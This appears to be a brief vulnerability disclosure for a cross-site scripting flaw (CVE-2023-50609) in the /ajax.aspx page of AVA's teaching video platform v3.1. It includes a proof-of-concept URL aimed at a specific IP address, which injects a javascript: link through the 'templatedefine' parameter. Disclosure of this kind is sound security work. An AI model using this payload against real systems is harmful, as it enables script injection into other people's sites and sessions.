zhishituboshu/CVE-2023-50609.md Secret

## CVE-2023-50609.md

      
    Raw
  

              CVE-2023-50609.md
            
          
    CVE_ID:

CVE-2023-50609
BUG_Author:

Ziyun Chai
Affected version:

AVA teaching video application service platform - V3.1
Vendor:

http://www.ava.com.cn/
Vulnerability File:

/ajax.aspx
Description:

Cross Site Scripting vulnerability in AVA teaching video application service platform v.3.1 allows a remote attacker to execute arbitrary code via a crafted script.
AVA teaching video application service platform v.3.1 has an XSS vulnerability in /ajax.aspx
Status: Moderate

http://124.114.153.218:8081/ajax.aspx?templatedefine=tes%3CA+hReF%3Djavascript:alert(%22hello!!!%22)%3Et%3C%2Fa%3E&null

Click

XSS vulnerability is executed